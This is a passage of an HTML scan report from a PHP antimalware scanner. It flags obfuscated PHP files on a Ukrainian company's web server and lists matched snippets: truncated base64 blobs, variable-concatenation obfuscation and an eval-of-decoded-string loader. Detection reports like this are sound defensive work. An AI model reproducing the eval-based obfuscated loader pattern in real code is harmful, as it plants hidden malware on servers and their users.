<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset='utf-8'>
    <meta http-equiv='X-UA-Compatible' content='IE=edge'>
    <title>Scan Report</title>
    <link rel="icon" type="image/png" sizes="16x16" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAACxMAAAsTAQCanBgAAAMoSURBVDhPZVPfaxxVFP7u/Mjszsya7KbbRNJ00xehWLCbQvGlfWj/gj4oCHlQH1aEin+Czz7mQdBiiiColD7oi1ow26gVKmqChobmRzXRupWku7PJ7M7s3J+eGVREL3PnXoY553zn+77D8J919eMvmsaYltH6ktZ6TisF2rtaqrbW6tp7Lz239tevxfonwWufLPvGYFEr+fLjbs/qHR4iHgxheS4qlQCh46JsOxpKXVdKvf7R1ReTPM7OX1TVh8FncRxfWb+/xRJmoXpqDokw8CYnEcxMg40HGKmMIR3NG6kuzM2fv7H9dVtYeQKCu0jBF3/a2oEuh2CVCUT9AeCOwQkD+LUqJk7OYvqZMyg9NQuh+cVsEC/msezVm583jTY/rK7fY6rkw6lOAjwDY9Sd7WBydgr1E3X4T/gIxym54uh8+x067btGpKNzFhHV2j84YBkR4IYV2JKDUWVjUXdSwC95ODtdR3WigkrgoeaNIfpxFQc795nkWcsidi93H/fguB6CSohjT06BaQWivmhhLCih79ko8RQbH97Eu88vYOWtt/Hw3jpkll12lBSNJCVC/RA8TWFy2dIhtOUSw4RKpFh9/wNs3P4Sw24X0cY6FBcUrCA4b1hKylxnKCGQ9A9xuH8APhxCxEdIOg9x550lrN1aQf/3PxBtbhLhBsym9iwLWnBQArHnOQ5UNiq2HBzRyYuTkxcU4RhFEZJHvxWuYdRqfvGCEJKLPSvt9ZZLzEAM4iKjJiSKTn7Ux7Czh/jnLbpHcMdrsIgTy3ULBEHtGCGXy/apc892ILLWo+1NlnQJfpIR9D2M6C6pFfIIPN9H5Xi9UCYvZOfyzpw0MOYV69M331hTnC/NTE8R7AFEtE8KGHIXPSQtGQJOuYz66adJVknVc280cg8tba7cWius3Jg/v8xgLpQdpxFHPchcDWrDkCcMBYlhjOjBNhR9r9aPY8wrfUXQFnq//iKKBLvf3xUnzjRvEEdTYbl0linJ/ibVECe20SgReePVmrZse4mwLTz45nYxTP8b5+aVF5payhbJe4lOGudC5l1ybJuqXtu50/7XOAN/Ar01xcqF8C92AAAAAElFTkSuQmCC" />
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <!-- JQuery -->
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js" crossorigin="anonymous"></script>
    <!-- Bootstrap -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/css/bootstrap.min.css" crossorigin="anonymous">
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.4/umd/popper.min.js" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/js/bootstrap.min.js" crossorigin="anonymous"></script>
    <!-- Font Awesome -->
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.2/css/all.css" crossorigin="anonymous">
    <!-- Google Fonts -->
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap">
    <!-- MDB -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/mdbootstrap/4.19.1/css/mdb.min.css">
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mdbootstrap/4.19.1/js/mdb.min.js"></script>
    <!-- Datatables -->
    <link rel="stylesheet" href="https://cdn.datatables.net/1.10.23/css/dataTables.bootstrap4.min.css" crossorigin="anonymous">
    <script type="text/javascript" src="https://cdn.datatables.net/1.10.23/js/jquery.dataTables.min.js" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdn.datatables.net/1.10.23/js/dataTables.bootstrap4.min.js" crossorigin="anonymous"></script>
    <style type="text/css">
        body{padding-top:3.7rem;overflow-x:hidden}.table code{overflow-wrap:break-word;word-break:break-word;hyphens:auto}.table>tbody>tr>th{vertical-align:middle}.table>tbody>tr>td p{line-height:100%}#report>tbody>tr>td table td+td{width:50%}#report>tbody>tr{cursor:pointer}#report .dataTables_wrapper{cursor:auto}.dataTables_wrapper{margin-top:1rem}.badge-fileinfo{color:#222!important;background-color:rgba(0,0,0,.05)!important}.pagination .page-item.active .page-link{border-radius:100%;width:35px;height:35px;text-align:center;line-height:35px;padding:0}#back-top{display:none;position:fixed;bottom:20px;border-radius:100%;right:30px;z-index:99;border:none;outline:0;color:#fff;cursor:pointer;vertical-align:middle;padding:0;line-height:50px;font-size:18px;height:50px;width:50px}#back-top:hover{background-color:#555!important}
    </style>
    <script type="text/javascript">
        function expandAll(){$("#report .dataTables_wrapper").show()}function collapseAll(){$("#report .dataTables_wrapper").hide()}function scrollToTop(){document.body.scrollTop=0,document.documentElement.scrollTop=0}!function(o){o(function(){o("#report tr").click(function(t){o(this).find("#report tr table, .dataTables_wrapper").toggle()}),o("#report tr table, #report .dataTables_wrapper").click(function(o){o.stopPropagation()}),window.onscroll=function(){document.body.scrollTop>20||document.documentElement.scrollTop>20?o("#back-top").show():o("#back-top").hide()}})}(jQuery);
    </script>
</head>
<body>
    <nav class="navbar navbar-dark bg-dark fixed-top">
        <div class="container-fluid">
            <span class="navbar-brand">
                <a href="https://github.com/marcocesarato/PHP-Antimalware-Scanner" class="text-white" target="_blank">
                    <i class="fab fa-github mr-3"></i>
                    PHP Antimalware Scanner
                </a>
            </span>
            <span>
                <button class="btn btn-sm btn-primary rounded-pill" onclick="expandAll()"><i class="fas fa-expand mr-3"></i> Expand All</button>
                <button class="btn btn-sm btn-danger rounded-pill" onclick="collapseAll()"><i class="fas fa-compress mr-3"></i> Collapse All</button>
                <a href="https://github.com/marcocesarato/PHP-Antimalware-Scanner" target="_blank">
                    <button class="btn btn-sm btn-secondary rounded-pill"><i class="fab fa-github mr-3"></i> Github</button>
                </a>
            </span>
        </div>
    </nav>
    <div class="jumbotron p-3 text-white bg-secondary">
        <div class="container">
            <h1 class="display-3">Report</h1>
            <p>
                <b>Version:</b> 0.10.4<br>
                <b>Scan date:</b> 2024-02-27 11:14:05<br>
                <b>Files analyzed:</b> 6562 <b>| Files infected:</b> 204
            </p>
        </div>
    </div>
    <div class="container">
        <table id="report" class="datatable container table table-bordered"><tbody><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/ene.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 18.47 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:46:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_0" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZDw20nBQjN9XYZz...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$G</span><span style="color: #007700">(</span><span style="color: #0000BB">$oaj</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_0").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/res.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.13 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:46:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_1" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmTzSIO8TeZn8fR5XCa...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$GBPBD</span><span style="color: #007700">.</span><span style="color: #0000BB">$gu</span><span style="color: #007700">.</span><span style="color: #0000BB">$XE</span><span style="color: #007700">.</span><span style="color: #0000BB">$iO</span><span style="color: #007700">.</span><span style="color: #0000BB">$pPdi</span><span style="color: #007700">.</span><span style="color: #0000BB">$emqDZ</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$gQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZiwpR</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmT...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span><span style="color: #0000BB">$nom</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_1").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/dop.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.13 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:46:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_2" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmTzSIO8TeZn8fR5XCa...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$GBPBD</span><span style="color: #007700">.</span><span style="color: #0000BB">$gu</span><span style="color: #007700">.</span><span style="color: #0000BB">$XE</span><span style="color: #007700">.</span><span style="color: #0000BB">$iO</span><span style="color: #007700">.</span><span style="color: #0000BB">$pPdi</span><span style="color: #007700">.</span><span style="color: #0000BB">$emqDZ</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$gQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZiwpR</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmT...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span><span style="color: #0000BB">$nom</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_2").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/last.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 18.47 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:46:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_3" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZDw20nBQjN9XYZz...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
